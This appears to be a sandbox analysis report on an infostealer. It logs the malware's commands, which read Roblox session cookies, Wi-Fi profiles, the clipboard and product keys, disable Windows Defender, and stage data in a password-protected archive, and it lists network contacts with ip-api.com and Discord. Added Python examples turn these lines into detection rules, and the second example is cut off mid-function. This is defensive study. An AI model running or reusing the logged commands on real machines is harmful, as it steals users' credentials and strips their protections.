powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI50802\rar.exe a -r -hp"Tookie57!" "C:\Users\Admin\AppData\Local\Temp\BczLB.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI50802\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI50802\rar.exe a -r -hp"Tookie57!" "C:\Users\Admin\AppData\Local\Temp\BczLB.zip" *

\??\c:\users\admin\appdata\local\temp\_mei50802\rar.exe 

c:\users\admin\appdata\local\temp\_mei50802\rar.exe  a -r -hp"Tookie57!" "C:\Users\Admin\AppData\Local\Temp\BczLB.zip" *

C:\Windows\Resources\Themes\icsys.icn.exe

C:\Windows\Resources\Themes\icsys.icn.exe

\??\c:\windows\resources\themes\explorer.exe

c:\windows\resources\themes\explorer.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\Resources\Themes\icsys.icn.exe

C:\Windows\Resources\Themes\icsys.icn.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

\??\c:\windows\resources\themes\explorer.exe

c:\windows\resources\themes\explorer.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "c:\users\admin\appdata\local\temp\zyron.exe ""

C:\Windows\system32\PING.EXE

ping localhost -n 3

C:\Users\Admin\AppData\Local\Temp\Zyron.exe

"C:\Users\Admin\AppData\Local\Temp\Zyron.exe"

\??\c:\users\admin\appdata\local\temp\zyron.exe 

c:\users\admin\appdata\local\temp\zyron.exe 

\??\c:\users\admin\appdata\local\temp\zyron.exe 

c:\users\admin\appdata\local\temp\zyron.exe 

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'c:\users\admin\appdata\local\temp\zyron.exe '"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Je ne serais pas résponsable des choses que tu feras avec ce tool', 0, 'Message de Tookie', 48+16);close()""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'c:\users\admin\appdata\local\temp\zyron.exe '

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\system32\mshta.exe

mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Je ne serais pas résponsable des choses que tu feras avec ce tool', 0, 'Message de Tookie', 48+16);close()"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h +s "c:\users\admin\appdata\local\temp\zyron.exe ""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎​   .scr'"

C:\Windows\system32\attrib.exe

attrib +h +s "c:\users\admin\appdata\local\temp\zyron.exe "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎​   .scr'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\attrib.exe

attrib -r C:\Windows\System32\drivers\etc\hosts

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xnurk0kv\xnurk0kv.cmdline"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFBD0.tmp" "c:\Users\Admin\AppData\Local\Temp\xnurk0kv\CSCA3421DF6F66549FE8B28B09F4344214B.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\attrib.exe

attrib +r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI57962\rar.exe a -r -hp"Tookie57!" "C:\Users\Admin\AppData\Local\Temp\FI9R0.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI57962\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI57962\rar.exe a -r -hp"Tookie57!" "C:\Users\Admin\AppData\Local\Temp\FI9R0.zip" *

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\wmsetup.log

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\Resources\Themes\icsys.icn.exe

C:\Windows\Resources\Themes\icsys.icn.exe

\??\c:\windows\resources\themes\explorer.exe

c:\windows\resources\themes\explorer.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "c:\users\admin\appdata\local\temp\zyron.exe ""

C:\Windows\system32\PING.EXE

ping localhost -n 3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\jawshtml.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fffaf7e46f8,0x7fffaf7e4708,0x7fffaf7e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2020,878826232115211738,3918295721067643570,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2024 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2020,878826232115211738,3918295721067643570,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2020,878826232115211738,3918295721067643570,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2716 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,878826232115211738,3918295721067643570,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,878826232115211738,3918295721067643570,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2020,878826232115211738,3918295721067643570,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5180 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2020,878826232115211738,3918295721067643570,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5180 /prefetch:8
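The process list above is the part of this report a detection engineer reuses. The Python below is an added example (not sandbox output and not BlankGrabber code) that runs one regex rule per behaviour over command lines copied from the list and folds the hits into a verdict; the rule names, the collection/staging split and the verdict threshold are this example's own choices, not sandbox signature names. Two things it makes explicit that the raw list does not: the self-delete is only visible in the parent cmd.exe line (the child ping localhost -n 3 is harmless on its own, so a rule keyed on ping.exe alone misses it), and the read-only toggle on the hosts file appears twice, -r before and +r after the write that the Files section records.

```python
import re
from collections import defaultdict

# Command lines copied from this report's process list, deduplicated, plus two
# benign Edge/CompPkgSrv lines as controls. Added example, not sandbox or stealer
# code. The -EncodedCommand payload is not on the page and is omitted here.
SAMPLE_CMDLINES = [
    r'powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand',
    r'netsh wlan show profile',
    r'attrib -r C:\Windows\System32\drivers\etc\hosts',
    r'powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY',
    r'tree /A /F',
    r'attrib +r C:\Windows\System32\drivers\etc\hosts',
    r'tasklist /FO LIST',
    r'getmac',
    r'C:\Users\Admin\AppData\Local\Temp\_MEI57962\rar.exe a -r -hp"Tookie57!" "C:\Users\Admin\AppData\Local\Temp\FI9R0.zip" *',
    r'wmic os get Caption',
    r'wmic csproduct get uuid',
    r'wmic path win32_VideoController get name',
    r"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault",
    r'C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "c:\users\admin\appdata\local\temp\zyron.exe ""',
    r'ping localhost -n 3',
    r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --mojo-platform-channel-handle=2024 /prefetch:2',
    r'C:\Windows\System32\CompPkgSrv.exe -Embedding',
]

# One regex per behaviour visible in the process list. Rule names are this
# example's own labels, not the sandbox's signature names.
RULES = {
    "encoded_powershell":  re.compile(r"powershell(\.exe)?\s.*-EncodedCommand\b", re.I),
    "wifi_profile_dump":   re.compile(r"\bnetsh\s+wlan\s+show\s+profile", re.I),
    "hosts_attrib_toggle": re.compile(r"\battrib\s+[-+]r\s+.*\\drivers\\etc\\hosts", re.I),
    "roblox_cookie_read":  re.compile(r"Get-ItemPropertyValue\b.*RobloxStudioBrowser.*\.ROBLOSECURITY", re.I),
    "recursive_dir_tree":  re.compile(r"\btree\s+/A\s+/F\b", re.I),
    "proc_enum_tasklist":  re.compile(r"\btasklist\s+/FO\s+LIST\b", re.I),
    "rar_encrypted_stage": re.compile(r"\brar\.exe\s+a\b.*\s-hp", re.I),
    "hw_fingerprint_wmic": re.compile(
        r"\bwmic\s+(os\s+get\s+Caption|csproduct\s+get\s+uuid|"
        r"computersystem\s+get\s+totalphysicalmemory|path\s+win32_VideoController)", re.I),
    "product_key_read":    re.compile(r"SoftwareProtectionPlatform.*BackupProductKeyDefault", re.I),
    # Self-delete: the parent cmd line carries the "&& del"; the child ping alone is harmless.
    "ping_delay_self_del": re.compile(r"\bping\s+localhost\s+-n\s+\d+.*&&\s*del\b", re.I),
}

COLLECTION = {"wifi_profile_dump", "roblox_cookie_read", "recursive_dir_tree",
              "proc_enum_tasklist", "hw_fingerprint_wmic", "product_key_read"}
STAGING_OR_EVASION = {"encoded_powershell", "hosts_attrib_toggle",
                      "rar_encrypted_stage", "ping_delay_self_del"}


def classify(cmdline):
    """Return the sorted names of every rule the command line matches."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))


def scan(lines):
    """Map each rule that fired to the command lines that triggered it."""
    hits = defaultdict(list)
    for line in lines:
        for name in classify(line):
            hits[name].append(line)
    return dict(hits)


def triage(lines):
    """Verdict: several distinct collection behaviours plus at least one
    staging/evasion behaviour in the same process tree (threshold is this example's)."""
    hits = scan(lines)
    collection = sorted(set(hits) & COLLECTION)
    staging = sorted(set(hits) & STAGING_OR_EVASION)
    verdict = "stealer-like" if len(collection) >= 3 and staging else "inconclusive"
    return {"hits": hits, "collection": collection,
            "staging_or_evasion": staging, "verdict": verdict}


if __name__ == "__main__":
    result = triage(SAMPLE_CMDLINES)
    for name, lines in sorted(result["hits"].items()):
        print(f"{name:22s} x{len(lines)}")
    print("verdict:", result["verdict"])
```

Each rule on its own is weak (tree /A /F and tasklist are run by administrators too); the value is in the combination within one process tree, which is why triage() requires collection plus staging rather than scoring single lines.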

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 blank-2qkse.in udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 227.16.217.172.in-addr.arpa udp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 72.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 232.137.159.162.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 blank-kzda6.in udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 52.111.229.43:443 tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 blank-xuiuv.in udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 109.116.69.13.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
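The network table mixes stealer traffic with sandbox background: Edge was launched on jawshtml.html and talks to Bing, the resolver issues reverse (in-addr.arpa) lookups, and one row is local mDNS. The Python below is an added example, not sandbox output. It parses the rows (the Domain column is absent on some of them), attributes each row with labels that reference this report's own signatures for ip-api.com and discord.com (the gstatic.com label is an assumption, and the blank-*.in pattern is simply what the three names in the table look like), and derives two things a flat block list would not: which domains were resolved but never connected to, and which TCP endpoints are shared-service addresses (a public IP-lookup API and Discord behind Cloudflare anycast) that should not be blocked on their own.

```python
import re
from collections import Counter

# Rows copied from this report's network table (a subset covering every row shape:
# with and without a resolved domain, reverse lookups, multicast). Constructed
# sample for this added example, not sandbox output.
SAMPLE_ROWS = """\
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 blank-2qkse.in udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 blank-kzda6.in udp
US 52.111.229.43:443 tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 blank-xuiuv.in udp
N/A 224.0.0.251:5353 udp
""".splitlines()

BLANK_DOMAIN = re.compile(r"blank-[a-z0-9]{5}\.in$")   # shape of the three names in the table
MALWARE_LABELS = {"external_ip_lookup", "discord_hosting_abuse", "blank_random_domain_lookup"}


def parse_row(line):
    """Split 'Country Destination [Domain] Proto' into a dict; Domain may be absent."""
    parts = line.split()
    if len(parts) == 4:
        country, dest, domain, proto = parts
    elif len(parts) == 3:
        country, dest, proto = parts
        domain = None
    else:
        raise ValueError(f"unexpected row: {line!r}")
    ip, port = dest.rsplit(":", 1)
    return {"country": country, "ip": ip, "port": int(port), "domain": domain, "proto": proto}


def label(row):
    """Attribute one row. 'report:' comments cite this report's own signatures;
    noise labels are sandbox background; gstatic is this example's assumption."""
    d = row["domain"]
    if row["ip"].startswith("224."):
        return "multicast_local_noise"
    if d is None:
        return "unattributed_ip"
    if d.endswith(".in-addr.arpa"):
        return "reverse_dns_noise"
    if d == "ip-api.com":
        return "external_ip_lookup"          # report: Looks up external IP address via web service
    if d == "discord.com":
        return "discord_hosting_abuse"       # report: Legitimate hosting services abused for C2
    if BLANK_DOMAIN.search(d):
        return "blank_random_domain_lookup"  # DNS only; no TCP connection follows in the table
    if d.endswith("bing.com") or d.endswith("bing.net"):
        return "edge_browser_noise"          # msedge.exe was launched on jawshtml.html
    if d == "gstatic.com":
        return "gstatic_probe"               # assumed connectivity check; not attributed by the report
    return "unclassified"


def summarize(lines):
    """Count rows per label."""
    return Counter(label(parse_row(l)) for l in lines)


def dns_only_domains(lines):
    """Domains that were resolved over UDP/53 but never connected to (reverse lookups excluded)."""
    rows = [parse_row(l) for l in lines]
    resolved = {r["domain"] for r in rows if r["proto"] == "udp" and r["port"] == 53 and r["domain"]}
    connected = {r["domain"] for r in rows if r["proto"] == "tcp" and r["domain"]}
    return sorted(d for d in resolved - connected if not d.endswith(".in-addr.arpa"))


def ioc_candidates(lines):
    """Domains and TCP endpoints attributed to the stealer. The endpoints are
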